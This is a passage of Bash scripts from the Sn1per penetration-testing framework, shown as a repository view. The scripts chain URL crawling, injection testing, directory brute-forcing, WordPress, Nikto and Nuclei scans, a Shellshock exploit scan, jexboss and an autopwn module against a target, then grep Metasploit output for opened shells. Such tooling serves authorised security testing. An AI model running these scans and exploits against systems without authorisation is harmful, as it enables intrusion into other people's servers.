echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
gau -subs $TARGET | tee $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null | head -n 250
fi
if [[ "$BLACKWIDOW" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
touch $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cp $LOOT_DIR/web/spider-$TARGET.txt $LOOT_DIR/web/spider-$TARGET.bak 2>/dev/null
blackwidow -u https://$TARGET:$PORT -l 3 -v n 2> /dev/null
cp -f /usr/share/blackwidow/"$TARGET"_"$PORT"/"$TARGET"_"$PORT"-*.txt $LOOT_DIR/web/ 2>/dev/null
cat /usr/share/blackwidow/"$TARGET"_*/"$TARGET"_*-urls-sorted.txt > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/hackertarget-*-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
mv -f $LOOT_DIR/web/spider-$TARGET.txtr $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
sort -u $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null > $LOOT_DIR/web/spider-$TARGET.sorted 2>/dev/null
mv $LOOT_DIR/web/spider-$TARGET.sorted $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
diff $LOOT_DIR/web/spider-$TARGET.bak $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2}' 2> /dev/null > $LOOT_DIR/web/spider-new-$TARGET.txt
if [[ $(wc -c $LOOT_DIR/web/spider-new-$TARGET.txt | awk '{print $1}') > 3 ]]; then
echo "[sn1persecurity.com] •?((¯°·._.• Spider URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
head -n 20 $LOOT_DIR/web/spider-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
fi
if [[ "$SLACK_NOTIFICATIONS_SPIDER_NEW" == "1" && "SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/spider-new-$TARGET.txt"
fi
fi
if [[ "$INJECTX" == "1" ]]; then
rm -f $LOOT_DIR/web/injectx-$TARGET-https-${PORT}.raw 2> /dev/null
#cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep 'https\:' | xargs -P $THREADS -r -n 1 -I '{}' injectx.py -u '{}' -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-https.txt
for a in `cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep "https\:" | cut -d '?' -f2 | cut -d '=' -f1 | sort -u`; do for b in `grep $a $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "https\:" | head -n 1`; do injectx.py -u $b -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-https-${PORT}.txt; done; done;
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/injectx-$TARGET-https-${PORT}.raw 2> /dev/null > $LOOT_DIR/web/injectx-$TARGET-https-${PORT}.txt
fi
source $INSTALL_DIR/modes/static-grep-search.sh
if [[ "$WEB_JAVASCRIPT_ANALYSIS" == "1" ]]; then
source $INSTALL_DIR/modes/javascript-analysis.sh
fi
touch $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
cp $LOOT_DIR/web/dirsearch-$TARGET.txt $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
if [[ "$WEB_BRUTE_COMMONSCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ "$DIRSEARCH" == "1" ]]; then
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_COMMON -x $WEB_BRUTE_EXCLUDE_CODES -F -e "$WEB_BRUTE_EXTENSIONS" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator,Page Not Found,URL No Longer Exists --random-agent --output=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
fi
if [[ "$GOBUSTER" == "1" ]]; then
gobuster -u https://$TARGET:$PORT -w $WEB_BRUTE_COMMON -e -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36" -t $THREADS -o $LOOT_DIR/web/webbrute-$TARGET-https-port$PORT-common.txt -fw -r
fi
fi
if [[ "$WEB_BRUTE_FULLSCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ "$DIRSEARCH" == "1" ]]; then
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_FULL -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator,Page Not Found,URL No Longer Exists --random-agent --output=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
fi
if [[ "$GOBUSTER" == "1" ]]; then
gobuster -u https://$TARGET:$PORT -w $WEB_BRUTE_FULL -e -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36" -t $THREADS -o $LOOT_DIR/web/webbrute-$TARGET-https-port$PORT-full.txt -fw -r
fi
fi
if [[ "$WEB_BRUTE_EXPLOITSCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ "$DIRSEARCH" == "1" ]]; then
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator,Page Not Found,URL No Longer Exists --random-agent --output=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
fi
if [[ "$GOBUSTER" == "1" ]]; then
gobuster -u https://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -e -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36" -t $THREADS -o $LOOT_DIR/web/webbrute-$TARGET-https-port$PORT-exploits.txt -fw -r
fi
fi
if [[ "$DIRSEARCH" == "1" ]]; then
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
sort -u $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > $LOOT_DIR/web/dirsearch-$TARGET.sorted 2> /dev/null
mv $LOOT_DIR/web/dirsearch-$TARGET.sorted $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
diff $LOOT_DIR/web/dirsearch-$TARGET.bak $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2 " " $3 " " $4}' 2> /dev/null > $LOOT_DIR/web/dirsearch-new-$TARGET.txt
if [[ $(wc -c $LOOT_DIR/web/dirsearch-new-$TARGET.txt| awk '{print $1}') > 3 ]]; then
echo "[sn1persecurity.com] •?((¯°·._.• Disovered URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
cat $LOOT_DIR/web/dirsearch-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
fi
if [[ "$SLACK_NOTIFICATIONS_DIRSEARCH_NEW" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/dirsearch-new-$TARGET.txt"
fi
fi
if [[ "$GOBUSTER" == "1" ]]; then
sort -u $LOOT_DIR/web/webbrute-$TARGET-*.txt 2> /dev/null > $LOOT_DIR/web/webbrute-$TARGET.txt 2> /dev/null
fi
wget --connect-timeout=5 --read-timeout=10 --tries=1 https://$TARGET:${PORT}/robots.txt -O $LOOT_DIR/web/robots-$TARGET:${PORT}-https.txt 2> /dev/null
if [[ "$CLUSTERD" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
clusterd --sVl -i $TARGET -p ${PORT} 2> /dev/null | tee $LOOT_DIR/web/clusterd-$TARGET-port${PORT}.txt
fi
if [[ "$CMSMAP" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING CMSMAP $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cmsmap https://$TARGET:${PORT} | tee $LOOT_DIR/web/cmsmap-$TARGET-http-port${PORT}a.txt
echo ""
cmsmap https://$TARGET:${PORT}/wordpress/ | tee $LOOT_DIR/web/cmsmap-$TARGET-http-port${PORT}b.txt
echo ""
fi
if [[ "$WPSCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ "$WP_API_KEY" ]]; then
wpscan --url https://$TARGET:${PORT} --no-update --disable-tls-checks --api-token $WP_API_KEY 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-https-port${PORT}a.raw
echo ""
wpscan --url https://$TARGET:${PORT}/wordpress/ --no-update --disable-tls-checks --api-token $WP_API_KEY 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-https-port${PORT}b.raw
echo ""
else
wpscan --url https://$TARGET:${PORT} --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-https-port${PORT}a.raw
echo ""
wpscan --url https://$TARGET:${PORT}/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-https-port${PORT}b.raw
fi
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wpscan-$TARGET-https-port${PORT}a.raw 2> /dev/null > $LOOT_DIR/web/wpscan-$TARGET-https-port${PORT}a.txt
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wpscan-$TARGET-https-port${PORT}b.raw 2> /dev/null > $LOOT_DIR/web/wpscan-$TARGET-https-port${PORT}b.txt
rm -f $LOOT_DIR/web/wpscan-$TARGET-http*.raw 2> /dev/null
fi
if [[ "$NIKTO" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
nikto -h https://$TARGET:${PORT} -output $LOOT_DIR/web/nikto-$TARGET-https-port${PORT}.txt
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/nikto-$TARGET-https-port${PORT}.txt
fi
if [[ "$SHOCKER" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
python3 $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --sVl --port ${PORT} | tee $LOOT_DIR/web/shocker-$TARGET-port${PORT}.txt
fi
if [[ "$JEXBOSS" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING JEXBOSS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cd /tmp/
python3 /usr/share/sniper/plugins/jexboss/jexboss.py -u https://$TARGET:${PORT} | tee $LOOT_DIR/web/jexboss-$TARGET-port${PORT}.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/jexboss-$TARGET-port${PORT}.raw > $LOOT_DIR/web/jexboss-$TARGET-port${PORT}.txt 2> /dev/null
rm -f $LOOT_DIR/web/jexboss-$TARGET-port${PORT}.raw 2> /dev/null
cd $INSTALL_DIR
fi
if [[ "$SMUGGLER" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING HTTP REQUEST SMUGGLING DETECTION $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
python3 /usr/share/sniper/plugins/smuggler/smuggler.py --no-color -u https://$TARGET:${PORT} | tee $LOOT_DIR/web/smuggler-$TARGET-port${PORT}.txt
fi
if [[ "$NUCLEI" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING NUCLEI SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
nuclei -silent -t /root/nuclei-templates/ -c $THREADS -target https://$TARGET:${PORT} -o $LOOT_DIR/web/nuclei-https-${TARGET}-port${PORT}.txt
fi
cd $INSTALL_DIR
SSL="true"
source $INSTALL_DIR/modes/web_autopwn.sh
source $INSTALL_DIR/modes/osint_stage_2.sh
fi
if [[ "$BURP_SCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING BURPSUITE SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -s -X POST "http://$BURP_HOST:$BURP_PORT/v0.1/scan" -d "{\"scope\":{\"include\":[{\"rule\":\"https://$TARGET:$PORT\"}],\"type\":\"SimpleScope\"},\"urls\":[\"https://$TARGET:$PORT\"]}"
echo ""
for a in {1..30};
do
echo -n "[-] SCAN #$a: "
curl -sI "http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a" | grep HTTP | awk '{print $2}'
BURP_STATUS=$(curl -s http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a | grep -o -P "crawl_and_audit.{1,100}" | cut -d\" -f3 | grep "remaining")
while [[ ${#BURP_STATUS} -gt "5" ]];
do
BURP_STATUS=$(curl -s http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a | grep -o -P "crawl_and_audit.{1,100}" | cut -d\" -f3 | grep "remaining")
BURP_STATUS_FULL=$(curl -s http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a | grep -o -P "crawl_and_audit.{1,100}" | cut -d\" -f3)
echo "[i] STATUS: $BURP_STATUS_FULL"
sleep 15
done
done
echo "[+] VULNERABILITIES: "
echo "----------------------------------------------------------------"
for a in {1..30};
do
curl -s "http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a" | jq '.issue_events[].issue | "[" + .severity + "] " + .name + " - " + .origin + .path' | sort -u | sed 's/\"//g' | tee $LOOT_DIR/web/burpsuite-$TARGET-$a.txt
done
echo "[-] Done!"
fi
if [[ "$ZAP_SCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING OWASP ZAP SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo "[i] Scanning: https://$TARGET:$PORT/"
sudo python3 /usr/share/sniper/bin/zap-scan.py "https://$TARGET:$PORT/"
DATE=$(date +"%Y%m%d%H%M")
sudo grep "'" /usr/share/sniper/bin/zap-report.txt | cut -d\' -f2 | cut -d\\ -f1 > $LOOT_DIR/web/zap-report-$TARGET-https-$DATE.html
cp -f $LOOT_DIR/web/zap-report-$TARGET-https-$DATE.html $LOOT_DIR/web/zap-report-$TARGET-https.html 2> /dev/null
echo "[i] Scan complete."
echo "[+] Report saved to: $LOOT_DIR/web/zap-report-$TARGET-https-$DATE.html"
fi
if [[ "$ARACHNI_SCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING ARACHNI SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
DATE=$(date +"%Y%m%d%H%M")
mkdir -p $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/
arachni --report-save-path=$LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/ --output-only-positives http://$TARGET:$PORT | tee ${LOOT_DIR}/web/arachni_webscan_${TARGET}_${PORT}_${DATE}.txt
cd $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/
arachni_reporter $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/*.afr --report=html:outfile=$LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/arachni.zip
cd $LOOT_DIR/web/arachni_${TARGET}_${PORT}_${DATE}/
unzip arachni.zip
cd $INSTALL_DIR
fi
if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING SC0PE WEB VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
SSL="true"
source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh
source $INSTALL_DIR/modes/sc0pe-active-webscan.sh
for file in `ls $INSTALL_DIR/templates/passive/web/recursive/*.sh 2> /dev/null`; do
source $file
done
source $INSTALL_DIR/modes/sc0pe-network-scan.sh
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
fi
source $INSTALL_DIR/modes/sc0pe.sh
cd $INSTALL_DIR
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED SCAN COMPLETE! $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
rm -f $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
rm -f $INSTALL_DIR/.fuse_* 2> /dev/null
VULNERABLE_METASPLOIT=$(egrep -h -i -s "may be vulnerable|is vulnerable|IKE response with leak|File saved in" $LOOT_DIR/output/msf-$TARGET-*.txt 2> /dev/null)
if [[ ${#VULNERABLE_METASPLOIT} -ge 5 ]]; then
echo "$VULNERABLE_METASPLOIT" > $LOOT_DIR/output/vulnerable-metasploit-$TARGET.txt 2> /dev/null
fi
VULNERABLE_SHELLSHOCK=$(egrep -h -i -s "The following URLs appear to be exploitable:" $LOOT_DIR/web/shocker-$TARGET-*.txt 2> /dev/null)
if [[ ${#VULNERABLE_SHELLSHOCK} -ge 5 ]]; then
echo "$VULNERABLE_SHELLSHOCK" > $LOOT_DIR/output/vulnerable-shellshock-$TARGET.txt 2> /dev/null
fi
SHELLED=$(egrep -h -i -s "Meterpreter session|Command executed|File(s) found:|Command Stager progress|File uploaded|Command shell session" $LOOT_DIR/output/msf-$TARGET-*.txt 2> /dev/null)
if [[ ${#SHELLED} -ge 5 ]]; then
echo "$SHELLED" > $LOOT_DIR/output/shelled-$TARGET.txt 2> /dev/null
fi
echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: https://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: https://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
if [[ "$LOOT" = "1" ]]; then
loot
fi
exit
fi

165
modes/webscan.sh Normal file
View File

@@ -0,0 +1,165 @@
if [[ "$MODE" = "webscan" ]]; then
echo -e "$OKRED ____ $RESET"
echo -e "$OKRED _________ / _/___ ___ _____$RESET"
echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo -e "$RESET"
echo -e "$OKORANGE + -- --=[https://sn1persecurity.com"
echo -e "$OKORANGE + -- --=[Sn1per v$VER by @xer0dayz"
echo -e ""
echo -e ""
echo -e " ; , "
echo -e " ,; '. "
echo -e " ;: :; "
echo -e " :: :: "
echo -e " :: :: "
echo -e " ': : "
echo -e " :. : "
echo -e " ;' :: :: ' "
echo -e " .' '; ;' '. "
echo -e " :: :; ;: :: "
echo -e " ; :;. ,;: :: "
echo -e " :; :;: ,;\" :: "
echo -e " ::. ':; ..,.; ;:' ,.;: "
echo -e " \"'\"... '::,::::: ;: .;.;\"\"' "
echo -e " '\"\"\"....;:::::;,;.;\"\"\" "
echo -e " .:::.....'\"':::::::'\",...;::::;. "
echo -e " ;:' '\"\"'\"\";.,;:::::;.'\"\"\"\"\"\" ':; "
echo -e " ::' ;::;:::;::.. :; "
echo -e " :: ,;:::::::::::;:.. :: "
echo -e " ;' ,;;:;::::::::::::::;\";.. ':."
echo -e " :: ;:\" ::::::\"\"\"':::::: \": ::"
echo -e " :. :: ::::::; ::::::: : ; "
echo -e " ; :: ::::::: ::::::: : ; "
echo -e " ' :: ::::::....:::::' ,: ' "
echo -e " ' :: :::::::::::::\" :: "
echo -e " :: ':::::::::\"' :: "
echo -e " ': \"\"\"\"\"\"\"' :: "
echo -e " :: ;: "
echo -e " ':; ;:\" "
echo -e " -hrr- '; ,;' "
echo -e " \"' '\" "
echo -e " ''''$RESET"
echo ""
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
touch $LOOT_DIR/scans/$TARGET-webscan.txt 2> /dev/null
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
if [[ "$BURP_SCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING BURPSUITE SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -s -X POST "http://$BURP_HOST:$BURP_PORT/v0.1/scan" -d "{\"scope\":{\"include\":[{\"rule\":\"http://$TARGET:80\"}],\"type\":\"SimpleScope\"},\"urls\":[\"http://$TARGET:80\"]}"
curl -s -X POST "http://$BURP_HOST:$BURP_PORT/v0.1/scan" -d "{\"scope\":{\"include\":[{\"rule\":\"https://$TARGET:443\"}],\"type\":\"SimpleScope\"},\"urls\":[\"https://$TARGET:443\"]}"
echo ""
for a in {1..30};
do
echo -n "[-] SCAN #$a: "
curl -sI "http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a" | grep HTTP | awk '{print $2}'
BURP_STATUS=$(curl -s http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a | grep -o -P "crawl_and_audit.{1,100}" | cut -d\" -f3 | grep "remaining")
while [[ ${#BURP_STATUS} -gt "5" ]];
do
BURP_STATUS=$(curl -s http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a | grep -o -P "crawl_and_audit.{1,100}" | cut -d\" -f3 | grep "remaining")
BURP_STATUS_FULL=$(curl -s http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a | grep -o -P "crawl_and_audit.{1,100}" | cut -d\" -f3)
echo "[i] STATUS: $BURP_STATUS_FULL"
sleep 15
done
done
echo "[+] VULNERABILITIES: "
echo "----------------------------------------------------------------"
for a in {1..30};
do
curl -s "http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a" | jq '.issue_events[].issue | "[" + .severity + "] " + .name + " - " + .origin + .path' | sort -u | sed 's/\"//g' | tee $LOOT_DIR/web/burpsuite-$TARGET-$a.txt
done
echo "[-] Done!"
fi
if [[ "$ZAP_SCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING OWASP ZAP SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo "[i] Scanning: http://$TARGET/"
sudo python3 /usr/share/sniper/bin/zap-scan.py "http://$TARGET/"
DATE=$(date +"%Y%m%d%H%M")
sudo grep "'" /usr/share/sniper/bin/zap-report.txt | cut -d\' -f2 | cut -d\\ -f1 > $LOOT_DIR/web/zap-report-$TARGET-http-$DATE.html
cp -f $LOOT_DIR/web/zap-report-$TARGET-http-$DATE.html $LOOT_DIR/web/zap-report-$TARGET-http.html 2> /dev/null
echo "[i] Scan complete."
echo "[+] Report saved to: $LOOT_DIR/web/zap-report-$TARGET-http-$DATE.html"
sleep 5
echo "[i] Scanning: https://$TARGET/"
sudo python3 /usr/share/sniper/bin/zap-scan.py "https://$TARGET/"
sudo grep "'" /usr/share/sniper/bin/zap-report.txt | cut -d\' -f2 | cut -d\\ -f1 > $LOOT_DIR/web/zap-report-$TARGET-https-$DATE.html
